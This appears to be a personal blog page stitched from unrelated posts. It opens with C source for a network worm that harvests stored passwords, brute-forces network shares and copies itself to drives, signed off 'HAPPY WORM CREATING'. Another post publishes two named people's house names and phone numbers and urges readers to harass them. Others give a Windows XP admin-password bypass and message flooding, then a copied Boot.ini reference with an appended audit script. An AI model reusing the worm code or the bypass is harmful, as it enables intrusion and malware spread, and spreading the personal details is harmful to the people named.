RegQueryValueEx(subkey, "Parm1enc", NULL, &junk, (BYTE *)wrightPwd, &len);

wrightPwd[len] = 0;

decodePW(wrightPwd);

addPassword( wrightPwd );

len = 256;

RegQueryValueEx(subkey, "Parm2enc", NULL, &junk, (BYTE *)readPwd, &len);

readPwd[len] = 0;

decodePW(readPwd);

addPassword( readPwd );

}

}

RegCloseKey(subkey);

RegCloseKey(key);

}

return 0;

}

//----------------------------------------------------------------------------//

void propogateDrive( void )

{

int length;

char buff[MAX_LENGTH], *ptr;

ptr = buff;

length = GetLogicalDriveStrings( MAX_LENGTH, ptr) ;

if( length > 0 && length <>

{

for( int i=0 ; i<=(length/4) ; i++ )

{

switch( GetDriveType( ptr ) )

{

case DRIVE_FIXED:

// The drive is a local drive.

printf("DRIVE_FIXED: %s\n", ptr);

attackDrive( ptr, 1 );

break;

case DRIVE_REMOTE:

// The drive is a network drive.

printf("DRIVE_REMOTE: %s\n", ptr);

attackDrive( ptr, 1 );

break;

default:

break;

}

*ptr+=1;

}

}

return;

}

//----------------------------------------------------------------------------//

void attackDrive( char * drive, int type )

{

FILE *fpAutorun;

char buff[MAX_LENGTH];

// copy worm to drive, Attribute = hidden

if( type == 1 )

{

sprintf( buff, "%s%s", drive, EARTH_WORM_JIM);

} else {

sprintf( buff, "%s\\%s", drive, EARTH_WORM_JIM);

}

printf("DEBUG: propogateDrive: attacking %s\nATTACK REMOTE: %s\n", drive, buff);

/* if( CopyFile( ptrEgo, buff, FALSE) == TRUE && type == 1 )

{

// create an Autorun.inf file on drive, Attribute = hidden

sprintf( buff, "%sAutorun.inf", drive);

fpAutorun = fopen(buff, "w");

if( fpAutorun != NULL )

{

fprintf( fpAutorun, "[Autorun]\nOPEN=%s\n", EARTH_WORM_JIM);

fclose( fpAutorun );

_rtl_chmod(buff, 1, FA_HIDDEN | FA_RDONLY);

}

} */

return;

}

//----------------------------------------------------------------------------//

void propogateNet( LPNETRESOURCE lpnr )

{

DWORD dwResult, dwResultEnum, cbBuffer = 16384, cEntries = 0xFFFFFFFF;

HANDLE hEnum;

LPNETRESOURCE lpnrLocal;

dwResult = WNetOpenEnum( RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, lpnr, &hEnum);

if( dwResult != NO_ERROR )

{

return;

}

do

{

lpnrLocal = (LPNETRESOURCE) GlobalAlloc(GPTR, cbBuffer);

dwResultEnum = WNetEnumResource(hEnum, &cEntries, lpnrLocal, &cbBuffer);

if ( dwResultEnum == NO_ERROR )

{

for( DWORD i = 0; i <>

{

if( RESOURCEUSAGE_CONTAINER == ( lpnrLocal[i].dwUsage & RESOURCEUSAGE_CONTAINER ) )

{

propogateNet( &lpnrLocal[i] );

} else if( RESOURCETYPE_DISK == ( lpnrLocal[i].dwUsage & RESOURCETYPE_DISK ) )

{

if( WNetAddConnection( lpnrLocal[ i ].lpRemoteName, NULL, NULL) == ERROR_INVALID_PASSWORD )

{

// try all found password/username combinations...

printf("ERROR_INVALID_PASSWORD "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName );

if( crackNetShare( lpnrLocal[ i ].lpRemoteName ) == 0 )

{

attackDrive( lpnrLocal[i].lpRemoteName, 0 );

WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);

}

} else {

attackDrive( lpnrLocal[i].lpRemoteName, 0 );

WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);

printf("ACCESS NOT DENIED "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName );

}

}

}

} else if( dwResultEnum != ERROR_NO_MORE_ITEMS ) {

break;

}

} while( dwResultEnum != ERROR_NO_MORE_ITEMS );

GlobalFree( (HGLOBAL) lpnrLocal );

WNetCloseEnum( hEnum );

return;

}

//----------------------------------------------------------------------------//

int crackNetShare( char * share )

{

int retval = 0;

for( int i=0 ; i

{

retval = WNetAddConnection( share , passwordList[i], NULL );

if( retval == NO_ERROR && retval != ERROR_INVALID_PASSWORD ) // <----- !!! dodgy testing, fix it

{

printf("PASS CRACKED: %s : %s\n", share , passwordList[i]);

return 0;

}

}

return -1;

}

//----------------------------------------------------------------------------//

void releasePayload()

{

printf("\n\t!!! PAYLOAD !!!\n");

return;

}

//----------------------------------------------------------------------------//


HAPPY WORM CREATING hehehe,.......do it for ur own risk ok...........

PICTURE OF THE DHIRAAGU WEB SERVER DEFACE


To while a go was looking my old data to clean and dump some out i have taken this picture from my friend chopey.......blog that was very long time post .... hey part no offen when i post it ...ok

MY TUNES (dhiraagu)

Here is a testing service that Dhiraagu gives, putting songs in the dial tones. If u want to do that setup, dial 155 from ur mobile, but remember they charge for the call................

DISTURBANCE CALLS

this bugger was disturbuing me and for my girl friend for a while here is the numbers details.....

Ahmed Naeem Ibrahim ,Weet House , 7897295

Mohamed Mukthar ,Irudheymaage , 7895098

i just tryed to search them throught they house name but dhiraagu have remove that feature......
that is shit if they can control the mobile freaks they must give these rights coustomers...........
hey all my blog readers plez call these two bugger and piss them offf i have bitter there mouth once u could give a try

Friday, June 23, 2006

with my heart

now im with my girl friend

HOW TO BREAK IN THE WINDOWZ ADMIN

These questions are very

I Forgot My Administrator Password!

I LOST IT My Administrator Password!

How to hack win xp? or I got a comp that I don’t know the password?

So never ask me again??? Here is it?

Can't Log On to Windows XP?

If that’s your only problem, then you probably have nothing to worry about. As long as you have your Windows XP CD, you can get back into your system using a simple but effective method made possible by a little known access hole in Windows XP.

ERD is an excellent multi-purpose product, but you should know it is not a necessary one if you have a healthy system and your sole problem is the inability to log on to Windows due to a forgotten password. It is not necessary because you can easily change or wipe out your Administrator password for free during a Windows XP Repair. Here’s how, with a step-by-step description of the initial Repair process included for newbies.

1. Place your Windows XP CD in your cd-rom and start your computer (it’s assumed here that your XP CD is bootable – as it should be - and that you have your bios set to boot from CD)

2. Keep your eye on the screen messages for booting to your CD. Typically, it will be “Press any key to boot from cd”.

3. Once you get in, the first screen will indicate that Setup is inspecting your system and loading files.

4. When you get to the Welcome to Setup screen, press ENTER to Setup Windows now.

5. The Licensing Agreement comes next - Press F8 to accept it.

6. The next screen is the Setup screen which gives you the option to do a Repair.

It should read something like “If one of the following Windows XP installations is damaged, Setup can try to repair it”

Use the up and down arrow keys to select your XP installation (if you only have one, it should already be selected) and press R to begin the Repair process.

7. Let the Repair run. Setup will now check your disks and then start copying files which can take several minutes.

8. Shortly after the Copying Files stage, you will be required to reboot. (This will happen automatically – you will see a progress bar stating “Your computer will reboot in 15 seconds”.)

9. During the reboot, do not make the mistake of “pressing any key” to boot from the CD again! Setup will resume automatically with the standard billboard screens and you will notice Installing Windows is highlighted.

10. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.

11. At the prompt, type NUSRMGR.CPL , COMPMGMT.MSC and press Enter. Voila! You have just gained graphical access to your User Accounts in the Control Panel.

12. Now simply pick the account you need to change and remove or change your password as you prefer. If you want to log on without having to enter your new password, you can type control userpasswords2 at the prompt and choose to log on without being asked for password. After you’ve made your changes close the windows, exit the command box and continue on with the Repair (have your Product key handy).

13. Once the Repair is done, you will be able to log on with your new password (or without a password if you chose not to use one or if you chose not to be asked for a password). Your programs and personalized settings should remain intact.

I tested the above on Windows XP Pro with and without SP1 and also used this method in a real situation where someone could not remember their password and it worked like a charm to fix the problem. This security hole allows access to more than just user accounts. You can also access the Registry and Policy Editor, for example. And it's GUI access with mouse control. Of course, a Product Key will be needed to continue with the Repair after making the changes, but for anyone intent on gaining access to your system, this would be no problem.

And in case you are wondering, NO, you cannot cancel install after making the changes and expect to logon with your new password.

Canceling will just result in Setup resuming at boot up and your changes will be lost.

Ok, now that your logon problem is fixed, you should make a point to prevent it from ever happening again by creating a Password Reset Disk. This is a floppy disk you can use in the event you ever forget your log on password. It allows you to set a new password.

Here's how to create one if your computer is NOT on a domain:

  • Go to the Control Panel and open up User Accounts.
  • Choose your account (under Pick An Account to Change) and under Related Tasks, click "Prevent a forgotten password".
  • This will initiate a wizard.
  • Click Next and then insert a blank formatted floppy disk into your A: drive.
  • Click Next and enter your logon password in the password box.
  • Click Next to begin the creation of your Password disk.
  • Once completed, label and save the disk to a safe place.

How to Log on to your PC Using Your Password Reset Disk

Start your computer and at the logon screen, click your user name and leave the password box blank or just type in anything. This will bring up a Logon Failure box and you will then see the option to use your Password Reset disk to create a new password. Click it which will initiate the Password Reset wizard. Insert your password reset disk into your floppy drive and follow the wizard which will let you choose a new password to use for your account.

Note: If your computer is part of a domain, the procedure for creating a password disk is different. plez google it for more information………….u will come across many tools & utilities……….search it…… work it out ….think it…… exploit it ………. feel the codes…. dream it……..

Virtual Communities aren't supposed to be physically real

This is one thing that I came across, very interesting ... read it, enjoy it...

Throughout this unit I have noticed a common theme, in that people seem to be linking the concept of "community" with a need for physical reality. There is no such need. Thousands of communities existed even before the Internet where there was no actual physical meeting place for the participants - they simply shared a common interest.

Sure, in Counter-Strike you aren't fighting in a real army and in World of Warcraft you aren't in a real place - We are all well aware of this, that doesn't lessen the groups that make up these online games as a community as long as they conform to a dictionary definition. The group of people who share the common interest of playing paintball aren't in a real army either, but that doesn't make their shared experience and community any less real - just different.

An interacting population of various kinds of individuals in a common location.

or

a body of persons of common interests scattered through a larger society (such as the academic community).

This is by no means an exhaustive list of definitions, but they are, I feel, the most important ones when considering this topic.

Can you argue that the population of an MMORPG such as World of Warcraft is not interacting in a common location? Sure, it isn't a physical location but it still is a location. When people ask you "Hey where did you find that information?" you say "On the Internet", you don't say "It came from this fake place that doesn't exist". Despite the lack of physicality it is still a location.

Secondly, a common interest is obviously shared in online games.

Thirdly, even if the Internet disappeared tomorrow for a week and there were no game servers to log onto there would still be a "World of Warcraft Community": Individuals scattered throughout the wider community who play the game. Even communities from players for individual servers.

I'll finish off with an example from my own gaming experience last night.

I was on the World of Warcraft server I play on in the city of Ironforge. This is the place where most members of the Alliance races go when looking for a group to adventure with since it has the most convenient services all gathered together. It is sort of a hub for all things Alliance.

Anyway, I saw someone advertising that they needed more people for a "raid" on a place called "Stratholme", it is a very dangerous area full of powerful enemies.

I said to them "If you need a hunter I will go with you" and I was quickly invited to join.

Once I was in the party there was some discussion about what other sorts of players we needed. Some said we needed another warrior, some wanted a mage or a warlock for spells. A few names of players interested in coming were put to the group, some of whom one or more of the various members objected to - "No, don't take Apok, he is too low level", "No, Don't take Mythrandir, he is a Ninja looter" (a ninja looter is someone who quickly snatches up loot which is useless for a character of his own class and simply wants to sell it for gold when another group member would have really liked to use it).

Eventually we got a party together that everyone was satisfied with, we all headed off to the area, where we planned our assault, laid down the law for the rules about the distribution of any loot and headed in.

A couple of hours later our raid was over. A few of the other members complimented me on my skill as a Hunter and we exchanged some negative words about 2 or 3 of the 10 members of the group who hadn't proven very good team-players and would likely find themselves excluded from future ventures.

.....

Now, yes I know none of that is physically real, but can anyone argue that a group of people are having experiences and interacting? Can anyone argue against the idea that there is a common interest?

You don't have to believe that Stratholme, Ironforge, or Night-Elf Hunters really exist in the physical world to accept that a group of people are interacting here.

It is the interaction that is important, not the physical existence of the meeting place.

I would have thought that since this unit is called "virtual communities" that is the whole point.

source http://teamscarlet.blogspot.com/

The NET SEND command may not work correctly on a computer that is running Windows XP Service Pack 2

WHEN U TRY TO SEND A NET SEND COMMAND IT WILL GIVE AN ERROR SAYING

An error occurred while sending a message to .
The message alias could not be found on the network.
More help is available by typing NET HELPMSG 2273.

CAUSE

The NET SEND command uses the Messenger service to send messages on the network. This problem occurs because the Messenger service is disabled. By default, the Messenger service is disabled on computers that are running Microsoft Windows XP SP2.

WORKAROUND

To work around this problem, change the Startup type of the Messenger service to Automatic, and then start the Messenger service. To do this, follow these steps:
1. Open Windows Explorer.
2. In the left pane, right-click My Computer, and then click Manage.
3. In the Computer Management window, expand Services and Applications in the left pane, and then click Services.
4. In the right pane, double-click Messenger.
5. In the Messenger Properties (Local Computer) dialog box, click the General tab.
6. On the General tab, select Automatic from the Startup type list, and then click Apply.
7. Under Service status, click Start, and then click OK.

THIS IS WHAT I HAVE DONE NOW IT WORKS FINE
.............HAPPY MSG FLOODINGS........

Boot INI Options Reference

WHEN I WAS SEARCHING IN THE INTERNET TO CHANGE MY BOOT SCREEN AND LOGIN SCREEN I CAME ACROSS THIS INFORMATION THAT IS VERY HANDY TO ME ...........


There are a number of BOOT.INI switches that are useful for driver developers who wish to test their drivers under a variety of different system configurations without having to have a separate machine for every one. For example, limiting the amount of memory NT sees can be useful for stressing memory loads, and limiting the number of processors for testing scalability. I've compiled a complete list of the options that BOOT.INI currently supports. This list is reproduced in the Startup, Shutdown and Crashes chapter of Windows Internals, where you'll find more information about the boot process. Entries in red were introduced in Windows 2000 and those in blue introduced in Windows XP or Windows Server 2003.

Note: to see what options a system has booted with, examine HKLM\System\CurrentControlSet\Control\SystemStartOptions.

/3GB

Increases the size of the user process address space from 2 GB to 3 GB (and therefore reduces the size of system space from 2 GB to 1 GB). Giving virtual-memory-intensive applications such as database servers a larger address space can improve their performance. For an application to take advantage of this feature, however, two additional conditions must be met: the system must be running Windows XP, Windows Server 2003, Windows NT 4 Enterprise Edition, Windows 2000 Advanced Server or Datacenter Server and the application .exe must be flagged as a 3-GB-aware application. Applies to 32-bit systems only.

/BASEVIDEO

Causes Windows to use the standard VGA display driver for GUI-mode operations.

/BAUDRATE=

Enables kernel-mode debugging and specifies an override for the default baud rate (19200) at which a remote kernel debugger host will connect. Example: /BAUDRATE=115200.

/BOOTLOG

Causes Windows to write a log of the boot to the file %SystemRoot%\Ntbtlog.txt.

/BOOTLOGO

Use this switch to have Windows XP or Windows Server 2003 display an installable splash screen instead of the standard splash screen. First, create a 16-color (any 16 colors) 640x480 bitmap and save it in the Windows directory with the name Boot.bmp. Then add "/bootlogo /noguiboot" to the boot.ini selection.

/BREAK

Causes the hardware abstraction layer (HAL) to stop at a breakpoint at HAL initialization. The first thing the Windows kernel does when it initializes is to initialize the HAL, so this breakpoint is the earliest one possible. The HAL will wait indefinitely at the breakpoint until a kernel-debugger connection is made. If the switch is used without the /DEBUG switch, the system will Blue Screen with a STOP code of 0x00000078 (PHASE0_EXCEPTION).

/BURNMEMORY=

Specifies an amount of memory Windows can't use (similar to the /MAXMEM switch). The value is specified in megabytes. Example: /BURNMEMORY=128 would indicate that Windows can't use 128 MB of the total physical memory on the machine.

/CHANNEL=

Used in conjunction with /DEBUGPORT=1394 to specify the IEEE 1394 channel through which kernel debugging communications will flow. This can be any number between 0 and 62 and defaults to 0 if not set.

/CLKLVL

Causes the standard x86 multiprocessor HAL (Halmps.dll) to configure itself for a level-sensitive system clock rather than an edge-triggered clock. Level-sensitive and edge-triggered are terms used to describe hardware interrupt types.

/CMDCONS

Passed when booting into the Recovery Console (described later in this chapter).

/CRASHDEBUG

Causes the kernel debugger to be loaded when the system boots, but to remain inactive unless a crash occurs. This allows the serial port that the kernel debugger would use to be available for use by the system until the system crashes (vs. /DEBUG, which causes the kernel debugger to use the serial port for the life of the system session).

/DEBUG

Enables kernel-mode debugging.

/DEBUGPORT=

Enables kernel-mode debugging and specifies an override for the default serial port (usually COM2 on systems with at least two serial ports) to which a remote kernel-debugger host is connected. Windows XP and Windows Server 2003 also support debugging through IEEE 1394 ports. Examples: /DEBUGPORT=COM2, /DEBUGPORT=1394.

/EXECUTE

This option disables no-execute protection. See the /NOEXECUTE switch for more information.

/FASTDETECT

Default boot option for Windows. Replaces the Windows NT 4 switch /NOSERIALMICE. The reason the qualifier exists (vs. just having NTDETECT perform this operation by default) is so that NTDETECT can support booting Windows NT 4. Windows Plug and Play device drivers perform detection of parallel and serial devices, but Windows NT 4 expects NTDETECT to perform the detection. Thus, specifying /FASTDETECT causes NTDETECT to skip parallel and serial device enumeration (actions that are not required when booting Windows), whereas omitting the switch causes NTDETECT to perform this enumeration (which is required for booting Windows NT 4).

/INTAFFINITY

Directs the standard x86 multiprocessor HAL (Halmps.dll) to set interrupt affinities such that only the highest numbered processor will receive interrupts. Without the switch, the HAL defaults to its normal behavior of letting all processors receive interrupts.

/KERNEL=
/HAL=

Enable you to override Ntldr's default filename for the kernel image (Ntoskrnl.exe) and/or the HAL (Hal.dll). These options are useful for alternating between a checked kernel environment and a free (retail) kernel environment or even to manually select a different HAL. If you want to boot a checked environment that consists solely of the checked kernel and HAL, which is typically all that is needed to test drivers, follow these steps on a system installed with the free build:

· Copy the checked versions of the kernel images from the checked build CD to your Windows\System32 directory, giving the images different names than the default. For example, if you're on a uniprocessor, copy Ntoskrnl.exe to Ntoschk.exe and Ntkrnlpa.exe to Ntoschkpa.exe. If you're on a multiprocessor, copy Ntkrnlmp.exe to Ntoschk.exe and Ntkrpamp.exe to Ntoschkpa.exe. The kernel filename must be an 8.3-style short name.

· Copy the checked version of the appropriate HAL needed for your system from I386\Driver.cab on the checked build CD to your Windows\System32 directory, naming it Halchk.dll. To determine which HAL to copy, open Windows\Repair\Setup.log and search for Hal.dll; you'll find a line like \WINDOWS\system32\hal.dll="halacpi.dll","1d8a1". The name immediately to the right of the equals sign is the name of the HAL you should copy. The HAL filename must be an 8.3-style short name.

· Make a copy of the default line in the system's Boot.ini file.

· In the string description of the boot selection, add something that indicates that the new selection will be for a checked build environment (for example, “Windows XP Professional Checked”).

· Add the following to the end of the new selection's line: /KERNEL=NTOSCHK.EXE /HAL=HALCHK.DLL

Now when the selection menu appears during the boot process you can select the new entry to boot a checked environment or select the entry you were using to boot the free build.

/LASTKNOWNGOOD

Causes the system to boot as if the LastKnownGood boot option was selected.

/MAXMEM=

Causes Windows to ignore (not use) physical memory beyond the amount indicated. The number is interpreted in megabytes. Example: /MAXMEM=32 would limit the system to using the first 32 MB of physical memory even if more were present.

/MAXPROCSPERCLUSTER=

For the standard x86 multiprocessor HAL (Halmps.dll), forces cluster-mode Advanced Programmable Interrupt Controller (APIC) addressing (not supported on systems with an 82489DX external APIC interrupt controller).

/MININT

This option is used by Windows PE (Preinstallation Environment) and causes the Configuration Manager to load the Registry SYSTEM hive as a volatile hive such that changes made to it in memory are not saved back to the hive image.

/NODEBUG

Prevents kernel-mode debugging from being initialized. Overrides the specification of any of the three debug-related switches, /DEBUG, /DEBUGPORT, and /BAUDRATE.

/NOEXECUTE

This option is only available on 32-bit versions of Windows when running on processors supporting no-execute protection. It enables no-execute protection (also known as Data Execution Prevention, or DEP), which results in the Memory Manager marking pages containing data as no-execute so that they cannot be executed as code. This can be useful for preventing malicious code from exploiting buffer overflow bugs with unexpected program input in order to execute arbitrary code. No-execute protection is always enabled on 64-bit versions of Windows on processors that support no-execute protection. There are several options you can specify with this switch:

· /NOEXECUTE=OPTIN Enables DEP for core system images and those specified in the DEP configuration dialog.

· /NOEXECUTE=OPTOUT Enables DEP for all images except those specified in the DEP configuration dialog.

· /NOEXECUTE=ALWAYSON Enables DEP on all images.

· /NOEXECUTE=ALWAYSOFF Disables DEP.

/NOGUIBOOT

Instructs Windows not to initialize the VGA video driver responsible for presenting bitmapped graphics during the boot process. The driver is used to display boot progress information, so disabling it will disable the ability of Windows to show this information.

/NOLOWMEM

Requires that the /PAE switch be present and that the system have more than 4 GB of physical memory. If these conditions are met, the PAE-enabled version of the Windows kernel, Ntkrnlpa.exe, won't use the first 4 GB of physical memory. Instead, it will load all applications and device drivers, and allocate all memory pools, from above that boundary. This switch is useful only to test device driver compatibility with large memory systems.

/NOPAE

Forces Ntldr to load the non-Physical Address Extension (PAE) version of the Windows kernel, even if the system is detected as supporting x86 PAEs and has more than 4 GB of physical memory.

/NOSERIALMICE=[COMx | COMx,y,z...]

Obsolete Windows NT 4 qualifier—replaced by the absence of the /FASTDETECT switch. Disables serial mouse detection of the specified COM ports. This switch was used if you had a device other than a mouse attached to a serial port during the startup sequence. Using /NOSERIALMICE without specifying a COM port disables serial mouse detection on all COM ports. See Microsoft Knowledge Base article Q131976 for more information.

/NUMPROC=

Specifies the number of CPUs that can be used on a multiprocessor system. Example: /NUMPROC=2 on a four-way system will prevent Windows from using two of the four processors.

/ONECPU

Causes Windows to use only one CPU on a multiprocessor system.

/PAE

Causes Ntldr to load Ntkrnlpa.exe, which is the version of the x86 kernel that is able to take advantage of x86 PAEs. The PAE version of the kernel presents 64-bit physical addresses to device drivers, so this switch is helpful for testing device driver support for large memory systems.

/PCILOCK

Stops Windows from dynamically assigning IO/IRQ resources to PCI devices and leaves the devices configured by the BIOS. See Microsoft Knowledge Base article Q148501 for more information.

/RDPATH=

Specifies the path to a System Disk Image (SDI) file, which can be on the network, that the system will use to boot from. Often used in conjunction with the /RDIMAGEOFFSET= flag to indicate to NTLDR where in the file the system image starts.

/REDIRECT

Introduced with Windows XP. Used to cause Windows to enable Emergency Management Services (EMS) that reports boot information and accepts system management commands through a serial port. Specify serial port and baudrate used in conjunction with EMS with redirect= and redirectbaudrate= lines in the [boot loader] section of the Boot.ini file.

/SAFEBOOT:

Specifies options for a safe boot. You should never have to specify this option manually, since Ntldr specifies it for you when you use the F8 menu to perform a safe boot. (A safe boot is a boot in which Windows only loads drivers and services that are specified by name or group under the Minimal or Network registry keys under HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot.) Following the colon in the option you must specify one of three additional switches: MINIMAL, NETWORK, or DSREPAIR. The MINIMAL and NETWORK flags correspond to safe boot with no network and safe boot with network support, respectively. The DSREPAIR (Directory Services Repair) switch causes Windows to boot into a mode in which it restores the Active Directory directory service from a backup medium you present. An additional option you can append is (ALTERNATESHELL), which tells Windows to use the program specified by the HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\AlternateShell value as the graphical shell rather than to use the default, which is Windows Explorer.

/SCSIORDINAL:

Directs Windows to the SCSI ID of the controller. (Adding a new SCSI device to a system with an on-board SCSI controller can cause the controller's SCSI ID to change.) See Microsoft Knowledge Base article Q103625 for more information.

/SDIBOOT=

Used in Windows XP Embedded systems to have Windows boot from a RAM disk image stored in the specified System Disk Image (SDI) file.

/SOS

Causes Windows to list the device drivers marked to load at boot time and then to display the system version number (including the build number), amount of physical memory, and number of processors.

/TIMERES=

Sets the resolution of the system timer on the standard x86 multiprocessor HAL (Halmps.dll). The argument is a number interpreted in hundreds of nanoseconds, but the rate is set to the closest resolution the HAL supports that isn't larger than the one requested. The HAL supports the following resolutions:

Hundreds of nanoseconds    Milliseconds (ms)
9766                       0.98
19532                      2.00
39063                      3.90
78125                      7.80

The default resolution is 7.8 ms. The system timer resolution affects the resolution of waitable timers. Example: /TIMERES=21000 would set the timer to a resolution of 2.0 ms.

/USERVA=

This switch is only supported on Windows XP and Windows Server 2003. Like the /3GB switch, this switch gives applications a larger address space. Specify the amount in MB between 2048 and 3072. This switch has the same application requirements as the /3GB switch and requires that the /3GB switch be present. Applies to 32-bit systems only.

/WIN95

Directs Ntldr to boot the Consumer Windows boot sector stored in Bootsect.w40. This switch is pertinent only on a triple-boot system that has MS-DOS, Consumer Windows, and Windows installed. See Microsoft Knowledge Base article Q157992 for more information.

/WIN95DOS

Directs Ntldr to boot the MS-DOS boot sector stored in Bootsect.dos. This switch is pertinent only on a triple-boot system that has MS-DOS, Consumer Windows, and Windows installed. See Microsoft Knowledge Base article Q157992 for more information.

/YEAR=

Instructs the Windows core time function to ignore the year that the computer's real-time clock reports and instead use the one indicated. Thus, the year used in the switch affects every piece of software on the system, including the Windows kernel. Example: /YEAR=2001. (This switch was created to assist in Y2K testing.)

Thanks to Jonas Fischer for pointing out the PCILOCK and NOSERIALMICE switches. Thanks to Rob Green for information on the FASTDETECT switch.

Copyright © 1996-2004 Mark Russinovich from www.sysinternals.com
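
A review of the switches above, as an added example (not part of the original article and not Sysinternals code): it parses the [operating systems] section of a constructed Boot.ini, flags entries that use /REDIRECT, /SAFEBOOT, /RDPATH or /YEAR, and applies the /TIMERES rounding rule. The sample file, the function names and the choice of which switches to flag are assumptions made for this example.

```python
import re

# Constructed sample Boot.ini for illustration; not taken from a real system.
SAMPLE = r'''[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
redirect=COM1
redirectbaudrate=115200
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Server" /fastdetect /REDIRECT
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Repair" /SAFEBOOT:MINIMAL(ALTERNATESHELL) /SOS
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Y2K lab" /TIMERES=21000 /YEAR=2001
'''

HAL_RESOLUTIONS = (9766, 19532, 39063, 78125)  # /TIMERES table, units of 100 ns

# Reviewer's notes (assumption: which switches deserve review is our choice).
REVIEW = {
    "/REDIRECT": "EMS accepts management commands over a serial port",
    "/SAFEBOOT": "normally added by Ntldr from the F8 menu, not by hand",
    "/RDPATH": "boots from an SDI file that can be on the network",
    "/YEAR": "overrides the real-time clock year for all software",
}

def timer_resolution(requested):
    """Closest HAL resolution that is not larger than the requested value."""
    fits = [r for r in HAL_RESOLUTIONS if r <= requested]
    return max(fits) if fits else None  # below 9766: the page gives no rule

def parse_entries(text):
    """Return [(description, [(SWITCH, value), ...])] from [operating systems]."""
    section, entries = None, []
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "operating systems":
            m = re.match(r'[^=]+="([^"]*)"(.*)', line)
            if m:
                parts = [re.split(r"[=:]", s, maxsplit=1) for s in m.group(2).split()]
                entries.append((m.group(1), [(p[0].upper(), "".join(p[1:])) for p in parts]))
    return entries

def audit(text):
    """Return (description, switch, note) for each switch that merits review."""
    findings = []
    for desc, switches in parse_entries(text):
        for name, value in switches:
            if name == "/TIMERES" and value.isdigit():
                findings.append((desc, name, f"effective {timer_resolution(int(value))} x 100 ns"))
            elif name in REVIEW:
                extra = "; shell taken from AlternateShell" if "(ALTERNATESHELL)" in value.upper() else ""
                findings.append((desc, name, REVIEW[name] + extra))
    return findings
```

Calling audit(SAMPLE) returns four findings; /fastdetect and /SOS are parsed but not flagged.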